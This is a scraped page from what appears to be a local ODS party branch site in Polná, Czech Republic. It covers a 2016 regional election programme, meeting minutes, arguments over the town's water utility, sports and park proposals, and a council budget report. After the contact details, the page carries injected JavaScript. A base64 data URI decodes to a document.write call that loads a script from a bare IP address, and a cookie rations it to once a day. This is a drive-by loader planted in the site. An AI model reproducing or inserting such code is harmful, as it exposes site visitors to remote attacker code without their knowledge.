Přemýšlíme pravicově

Současnost v Polné

kandidatni-listina-ods-vysocina-_-jihlava

Programové priority ODS na Vysočině pro krajské volby 7. – 8. října 2016 www.odsvysocina.cz   

Obzvláště důležitý je pro nás důraz na bezpečný a klidný život na Vysočině. Chceme proto rozvíjet spolupráci s Policií České republiky a s Hasičským záchranným sborem ČR, stejně jako s dobrovolnými hasiči, a to zejména v rámci Integrovaného záchranného systému. Za samozřejmou považujeme podporu kvalitního fungování Zdravotnické záchranné služby.

 Jsme si vědomi toho, že aktivní podpora podnikání přináší nové pracovní příležitosti.

Veřejný sektor má však příznivé prostředí pro podnikání spoluvytvářet, a ne je deformovat výběrovými dotacemi. Úřady nemají vytvářet pracovní příležitosti, nýbrž nepřekážet těm, kteří se o jejich vznik snaží. 

V sociální politice chceme podpořit ty, kteří pracují, nebo aktivně práci hledají, a mají snahu zlepšovat život svůj i svých blízkých. Odměňována má být aktivita. Zneužívání sociálních opatření a dávek odmítáme. 

Jsme pro vyrovnané, resp. mírně přebytkové hospodaření a promyšlené nakládání s veřejnými prostředky. Jsme pro úsporné, efektivní a vstřícné fungování Kraje. Zasadíme se o zcela transparentní hospodaření úřadu i jím řízených institucí a rovněž o průhledné vypisování veřejných zakázek podle pravidel.

 Jsme přesvědčeni a zcela respektujeme, že Kraj a jeho orgány nejsou nadřízeny městům a obcím, ale mají být jejich přirozeným partnerem a pomocníkem. 

Budeme podporovat pravidelné a odpovídající investice do oprav a zkvalitňování silniční sítě na Vysočině, přičemž zajistíme průhledné zadávání zakázek. Jsme pro opravy a investice na základě veřejně známého, dodržovaného a dlouhodobého plánu.

 Zjednodušíme cestování obyvatelům Vysočiny zavedením jednotné jízdenky pro různé druhy hromadné veřejné dopravy. Budeme usilovat o vznik integrovaného dopravního systému na Vysočině, k jehož zavedení za minulých osm let stále nedošlo. 

Bohatý spolkový život, rozmanité a nezávislé kulturní aktivity, výkonnostní i rekreační sport považujeme za podstatnou součást svobodného prostoru občanské společnosti. Hodláme tento život podporovat, mimo jiné formou pravidelně vypisovaných grantů pro kulturní instituce, spolky a sportovní sdružení. 

Chceme podporovat kvalitnější výuku cizích jazyků i prostřednictvím podpory tzv. bilingvních tříd, ve kterých by se vyučovaly předměty v cizím jazyce, a motivovat žáky k získávání mezinárodních jazykových certifikátů, které jasně prokazují dosaženou úroveň žáka v cizím jazyce. 

Ředitelé, učitelé a další zaměstnanci ve školách jsou zatíženi čím dál větší byrokracií. Tuto zátěž chceme snížit. Ve škole se má učit a vychovávat, a ne vyplňovat tabulky a popisovat stovky stran zprávami o všem možném.

 Zasadíme se o zavedení jednotné (sdílené) vstupenky do kulturních zařízení Kraje Vysočina, s níž by bylo možné navštěvovat různé instituce na území Kraje. Zároveň s tím podporujeme finanční zvýhodnění pro časté návštěvníky těchto krajských zařízení. 

V zájmu pěstování a rozvíjení kulturních hodnot mládeže podpoříme volný vstup pro žáky a studenty z Vysočiny do kulturních institucí Kraje.

Považujeme za nutné, aby Kraj Vysočina důsledně podporoval zemědělce na Vysočině v jednání se státem. Zejména v otázce srovnávání podmínek postavení zemědělců mezi tzv. starými a novými zeměmi EU. Ať už v oblasti snižování sociálních odvodů či slevy na daních z dotací EU do živočišné výroby od roku 2016

Jasná pravidla, zodpovědná řešení!

 

Usnesení z členské schůze MS ODS Polná ze dne 6.6.2016
Přítomni: Jahoda B., Kubašta M., Neubauer J., Suchý J., Vlach I., Vlach P.,
Vencovský P.
1. MS ODS Polná doporučuje vedení ODS více reagovat a uskutečňovat kon- Struktivní, srozumitelné a zásadnější vyjádření k hlavním a důležitým té- matům v naší společnosti tak, aby tato vyjádření oslovila co nejširší část obyvatel ČR.

2. MS ODS Polná doporučuje vedení ODS, aby byla stále otevřenou stranou a vždy se snažila sjednocovat a podporovat vyjednávání potřeby míru u nás i ve světě. Zejména, když vnímáme velký nárůst státní moci, velký rozvoj vojenské techniky (včetně jaderných zbraní) a migrace.

3. MS ODS Polná vybrala od členů 3.700,-Kč na částečnou úhradu dluhu OS Jihlava vůči ODS.
(Apfelthaler L. – 500,-Kč , Bárta P. – 500,-Kč , Jahoda B. – 500,-Kč , Kubaš-
Ta M. – 500,-Kč , Neubauer J. – 100,-Kč , Suchý J. – 100,-Kč , Vlach I. –
500,-Kč , Vlach P. – 500,-Kč , Vencovský P. – 500,-Kč)
4. MS ODS Polná navrhuje, aby jednání OR ODS Jihlava probíhala také střídavě v místních sdruženích oblasti. Tímto způsobem zapojíme více členskou základnu do činnosti oblasti.
S usnesením souhlasí všichni přítomní členové MS ODS Polná.
Zapsal: Kubašta Miloš – předseda MS ODS Polná

 

 

Polná a pitná voda

 

V pondělí 2. června jsem byl přítomen na jednání zastupitelstva města Polná, na kterém se také projednávalo, zda Polná zůstane ve Svazu vodovodů a kanalizací Jihlavsko. Toto rozhodnutí fakticky znamená trvalé uzavření vodárny v Polné. To je v příkrém rozporu s názorem MS ODS Polná, které podporuje vystoupení Polné ze SVaKu Jihlavsko a provoz vodovodu a kanalizace, včetně vodárny pod MÚ Polná.

 

Na zmíněném zastupitelstvu předložil starosta pan Jindřich Skočdopole návrh Rady města na usnesení o setrvání Polné ve SVaKu. Pan Ivan Klusáček (Dobrá adresa) přednesl protinávrh o vystoupení Polné ze SVaKu a odebírání vody z úpravny Jihlava. Protinávrh pana Klusáčka byl poté při hlasování zamítnut, když většina zastupitelů se zdržela hlasování. Nevím, proč se tato většina nevyjádřila jasně: ano vystoupit – ne nevystoupit. Při hlasování o návrhu pana starosty většina zastupitelů svůj návrh vyjádřila a odsouhlasila setrvání Polné ve SVaKu. Vedení města za správnou cestu považuje změnu fungování SVaKu a výměnu předsedy SVaKu. Na čem je stavěn tento optimismus, nechápeme. Pan starosta v Pz(květen 2014) sám uvedl, že jeho výzvu ke svolání mimořádné valné hromady SVaKu reagovala pouze cca polovina členských obcí a pouze 3 obce jej podpořily. Jenom tato jediná zkušenost by vedení města měla přivést ke změně názoru! „Nekopání“ do SVaKu stojí Polnou miliony!

 

Proč jsme proti setrvání Polné ve SVaKu?

 

SVaK se stále soudí s Jihlavou o vypořádání majetku a konec tohoto sporu je v nedohlednu. Členské obce jsou v tomto sporu rukojmím SVaKu. SvaK žádné peníze nevlastní a náklady soudního řízení a také již exekucí, které sám SVaK vyvolává tím, že platná a vykonatelná rozhodnutí nerespektuje, může zaplatit z jediného zdroje – peněz, které občané platí za vodu. Chybějící peníze pak nahradí buď zvýšení cen vodného nebo tyto peníze prostě budou chybět na opravách a rozvoji vodovodní a kanalizační sítě v obcích. Vystoupení ze SVaKu je jedinou možností, jak tyto ztráty minimalizovat!

 

Proč nebrat vodu z Jihlavy?

 

Kapacita polenské vodárny je dostatečná pro Polnou i Dobronín. Argument, že voda z Polné je drahá, nelze prověřit, neboť toto tvrdí pouze výrobce vody VAS a.s. Jihlava a vedení města si ani nevyžádalo kalkulaci na výrobu vody. To samé platí i o výjimce hygieny. Pátral snad někdo z vedení města za jakých podmínek lze polenskou vodárnu provozovat? Kdybychom vystoupili ze SVaKu a brali vodu z Jihlavy, tak budeme platit zisk výrobci vody, který jistě nebude malý. Dále zaplatíme za provoz (+ zisk) vodovodního potrubí, které patří Jihlavě a v neposlední řadě za provoz (+ zisk) vodovodního potrubí z Jihlavy do Polné, které patří SVaKu. Lze říci, že tyto pronájmy a zisky srovnají výslednou výrobní cenu upravené vody.

 

Jak zmínil pan starosta, vedení města jednalo se dvěma potencionálními zájemci o provozování vodohospodářského díla v Polné. Proč, když máme v Polné lidi, kteří tomu rozumí a umí vodu upravit? Proč dávat zisk cizím firmám, když může zůstat v Polné v rozpočtu města? Je pravda, že úpravna vody je nedělitelný majetek. Jednal už někdo z vedení města s vedením Dobronína, o společné politice vůči SVaKu? V případě společného vystoupení by nic nebránilo předání úpravny vody ve stavu, v jakém byla před zakonzervováním.

 

Vedení města krizi ve SVaKu ignoruje již pět let, od okamžiku, kdy svůj úmysl vystoupit oznámila Jihlava. Věříme, že nové zastupitelstvo, které vzejde z komunálních voleb, bude „naši“ variantu prosazovat.

 

Při nahlédnutí na internetovou prezentaci města zjistíte, že zastupitelstvo o vystoupení nebo setrvání ve SVaKu vlastně nejednalo a nehlasovalo. Celá věc je odbyta tím, že zastupitelstvo bere na vědomí informaci starosty o současném stavu SVaK Jihlavsko.

 

 

 

Kubašta Miloš

 

MS ODS Polná         www.polna-lidem

 

Sportoviště v Polné

 Když jsem byl kluk školou povinný, tak se sportovalo na každém plácku ať formou fotbálku nebo hřišť pro mrňata. V  zimě zas na rybnících bylo samé hřiště, kde se do tmy hrál hokej nebo se jen tak bruslilo. Dnešní uspěchaná a tvrdá doba nese to, že rodiče jsou do večera v práci a nemají často čas na děti, jak by chtěli. Tento problém pomáhají řešit různé zájmové sdružení, které vedou mládež k pohybovým aktivitám, ke kultuře, ke sportu, zlepšující koordinaci těla a soustředěnost, optimismus a na lepší pohled na trávení volního času. Krásným příkladem je například sdružení volejbalu v Polné, kde tráví čas děti společně s rodiči v dětském koutku, který si tam volejbalisté vytvořili. Toto je jedna z cest jak odtáhnout děti od vysedávání v parku, u počítačů atd.

Pomozme dětem a mládeži a lidem v Polné ,vytvořit místa pro sport, pro aktivitu, kde jim to umožníme.  Co třeba například úprava Polenského hokejového stadionu! Toto sportoviště nemusí býti jen na bruslení. Když by se tam udělal betonový povrch a mantinely, tak bude areál využíván 12 měsíců v roce. Dá se tam hrát spousta sportů jako nohejbal , volejbal , tenis , házená, košíková, hokejbal, hokej, místo kde se dá jezdit na kolečkových bruslích, větší investice by nebyla potřeba , protože by se dalo využít zázemí Městského stadionu .

Další věc, která je potřeba v Polné je cyklostezka, okruh který bude třeba mít 2 , 3 , 4 km .  Jezdíme často do Přibyslavi a potkáváme na místní cyklostezce desítky Nás Poleňáků . Je třeba se zamyslet a vytvořit dětem a mládeži a nám dospělým další možnosti se někde protáhnout a zasportovat. Sportem našich děti a mládeže uděláme další krok k šanci, že nebudou sedět v parku , nebo kouřit, pít alkohol v háječku nebo brát drogy.

 

 

Pavel Vencovský , Petr Vlach          MS ODS Polná

facebook          Polná-lidem „ODS Polná“  

Nekopat do SVAKu!

Touto větou shrnul na veřejném jednání k uzavření polenské vodárny starosta Jindřich Skočdopole představu vedení města o zásobování vodou. A to přestože:
1. SVAK je v krizi od roku 2009, kdy Jihlava oznámila záměr vystoupit
2. Vedení SVAKu brání vydání majetku Jihlavy a na právní služby, nyní i exekuční náklady vynakládá milionové částky. Protože SVAK žádné hodnoty nevytváří, bud…ou tyto peníze platit občané v ceně vodného. Pokud SVAK dnes tyto peníze vezme z prostředků na obnovu a rozvoj sítí, zaplatí to občan zítra!
3. Rychlý růst ceny vodného přímo vybízí k hledání levnější vody z místních zdrojů. Dvacet let nečinnosti skončilo uzavřením vodárny. Bez vlastní vodárny bude Polná rukojmím sporů mezi Jihlavskou vodárenskou a Vodárenskou akciovou!
Nyní reálně hrozí, že vedení SVAK se podaří prosadit takovou změnu stanov, která obce o jejich vložený majetek reálně připraví – pokud ze SVAKu vystoupí, odejdou bez majetku. Politika „nekopání do SVAKu“ skončí tím, že v Polné budeme mít vodu předraženou hned dvakrát. Jednak o zisky producenta (Jihlavské vodárenské) a dopravce (Vodárenské akciové), jednak o režie SVAK. A v režii SVAK se nepochybně projeví náklady na nesmyslně vedené spory s Jihlavou i skutečnost, že náklady na fungování SVAKu se budou prostě rozpouštět na třetinový objem spotřebované vody, než tomu bylo v době členství Jihlavy.
Pokud se vedení města hájí prostředky, které Polná získává od SVAKu, jde ve skutečnosti o peníze, které občané Polné ve vodném a stočném zaplatili a které do rozpočtu přicházejí po zrekvírování 20 % DPH a transakčních nákladů SVAK. Ve skutečnosti jde o skrytou místní daň, z níž pouze část doputuje do městského rozpočtu zpátky.
Je zřejmé, že vedení města si z usnesení říjnového zastupitelstva, které se vyslovilo proti uzavření polenské vodárny, mnoho nedělá. A členové zastupitelstva všech politických adres se spokojili s přijetím rozhořčené deklarace. Místo toho, aby se ptali, jak je s usnesením naloženo, rozhořčeně krčí rameny. Používat vodu jenom jako předvolební téma je krátkozraké, po volbách mohou být v platnosti nové stanovy SVAK a už si nikdo nekopne.
Polná je dnes jedním z největších podílníků SVAK a nic jí nebrání jednat s ostatními obcemi o jeho budoucnosti. Zabránit vedení SVAKu blokovat možnosti vystoupení je jen prvním nezbytným krokem. Současně s tím je nutno zpracovat koncepci zásobování města vodou z vlastních zdrojů a podle ní dál postupovat. Zatím se však neudělalo nic a není pravda, že času je dostatek. Uzavřená vodárna chátrá a vedení SVAKu pracuje na zabetonování svých pozic.

 

Pavel Bárta a Miloš Kubašta
MS ODS POLNÁ

facebook –     polná-lidem „ODS Polná“

Kubašta Miloš

Miloš Kubašta

– předseda MS Polná, člen rady MS Polná, člen Oblastní rady ODS Jihlava

Bárta Pavel                                                                                                                                                                                                                                                                                                                                       – místopředseda MS, člen rady MS ODS Polná

Vlach Petr

– člen rady MS ODS Polná

Členové ODS Polná :

Apfelthaler Ladislav

Hurych Tomáš

Jelínek Miloš

Vlach Ivan

Vlach Radan

Suchý Jaroslav

Neubauer Jaroslav

Vencovský Pavel

 

facebook – polná – lidem   , e-mail :  info@polna-lidem.cz ));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(‚

Jinýma očima

 

„Jako malý kluk jsem viděl Háječek jako velký starý les ,kde se dobře jezdilo na kole. Ve školních letech se dobře stavěly bunkry a hrálo se s dívkami na schovávanou. V dospělosti jsem viděl Háječek jako starý les ,používaný mládeží k ranním a večerním schůzkám. Viděl jsem Háječek jako špinavý ,zarostlý ,plný lahví a dalších věcí. Dnes při procházce „novým Háječkem“ se těším…“

Petr Vlach

 

Každé radikální řešení přináší spoustu otázek. Je jedno zda za to může kůrovec či staré stromy. Uvědomili jsme si, že tento hospodářský les je již nedílnou součástí nás Poleňáků, les z obou stran obestavěný našimi životy, les, který žije v našich srdcích.

Snad samozřejmostí budou další úpravy Háječku. Vybagrování a dočištění pařezů, srovnání a úprava cesty, osazení háječku lavičkami či malým altánem. Dovýsadba dalších stromů (smrk ,borovice) se přímo nabízí proto, aby Háječek nebyl přes zimu tak smutný. Chceme aby se Háječek stal LESOPARKEM, okrasným, estetickým a krajinotvorným. Víme, že polenský lesopark Háječek umístěný blízko centra města má před sebou velkou budoucnost a stane se tak krásným  a čistým místem pro odpočinek a relaxaci nás Poleňáků.

Miloš Kubašta a Petr Vlach

Polná lidem

             facebook  –   polná-lidem „ODS Polná“ 

Informace ze 7. zasedání zastupitelstva města Polná

pondělí 12. 12. 2011

Na programu 7. zasedání zastupitelstva bylo několik bodů programu, z nichž nejdůležitějším bylo projednání a následné odsouhlasení rozpočtu města Polná na rok 2012. Rozpočet města byl projednán na 18. a 19. zasedání rady města, a na pracovním semináři zastupitelstva 10. 11. 2011. Zabývali se jím finanční a kontrolní výbor. Jak rada města, tak i výbory zastupitelstvu doporučili rozpočet schválit, což se po zodpovězení několika dotazů také stalo. Příjmová i výdajová stránka rozpočtu je vyrovnaná. Rozpočet v tuto chvíli počítá s příjmy ve výši 66 292 000 Kč, přičemž 2/3 příjmů tvoří daňové příjmy. Schválením rozpočtu se město Polná stalo jedním z mála obcí na Vysočině, která nemusí pro příští rok pracovat s rozpočtovým provizoriem.
Z dalších bodů programu bych chtěl poukázat na výsledek přezkoumání hospodaření města za rok 2011. Kontrola byla provedena pracovníky Krajského úřadu. Během kontroly nebyly zjištěny žádné chyby ani nedostatky.
Zastupitelé dále schválili limity prostředků na platy a odměny zaměstnanců města a odměny radním, zastupitelům, předsedům a členům výborů zastupitelstva města, předsedům a členům komisí rady města. Tyto limity zůstaly ve stejné výši jako v roce 2011.
Záměrem města je i účastnit se Programu prevence kriminality Kraje Vysočina na rok 2012. Jedná se o dotační titul, o který musí město požádat.

Zdeněk Dvořák